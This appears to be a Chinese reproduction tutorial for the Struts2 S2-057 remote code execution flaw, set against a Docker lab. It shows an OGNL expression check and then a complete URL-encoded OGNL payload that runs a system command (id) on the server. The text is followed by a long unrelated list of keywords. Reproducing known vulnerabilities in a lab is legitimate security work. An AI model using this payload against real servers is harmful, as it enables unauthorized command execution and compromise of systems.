如何进行Struts2-057 远程代码执行漏洞复现
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,这篇文章将为大家详细讲解有关如何进行Struts2-057 远程代码执行漏洞复现,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。一、使用docker搭建
千家信息网最后更新 2025年01月20日如何进行Struts2-057 远程代码执行漏洞复现
这篇文章将为大家详细讲解有关如何进行Struts2-057 远程代码执行漏洞复现,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
一、使用docker搭建环境
访问页面 http://ip:8080/struts2-showcase
二、漏洞验证
访问 /struts2-showcase/${(111+111)}/actionChain1.action 试试看
变成了 /struts2-showcase/222/register2.action
执行了,说明可能存在struts2-057漏洞
三、漏洞利用
执行命令的poc
/index/%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
执行,得到了id命令执行的返回(url中)
关于如何进行Struts2-057 远程代码执行漏洞复现就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
代码
内容
命令
文章
更多
知识
篇文章
不错
环境
质量
页面
参考
帮助
有关
验证
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
蛙扑网络技术有限公司
常见的网络安全威胁的形式
交通银行软件开发电话
mcu软件开发工程师笔试
浅谈网络安全法的重要性
最严重的网络安全问题
服务器主板实施品牌战略的意义
服务器虚拟主机能玩游戏么
学网络安全需要什么数学水平
大学网络安全检查方案
网络安全等级五级
电脑软件开发工程需要出差吗
软件开发中的测试活动
软件开发派遣
央视 郑州网络安全
中国网络安全后起之秀
阿里还在用oracle数据库吗
数据库查询时间段
北京赛车软件开发商
陕西智慧灯杆软件开发
sql数据库目录修改
软件开发岗位替代了哪些岗位
通信工程和数据库论文题目
软件开发团队提成分配
和平精英需不需要谷歌服务器框架
边缘计算网络安全吗
软件开发使用win7版本
隔离层次数据库
服务器安全维护
北京赛车软件开发商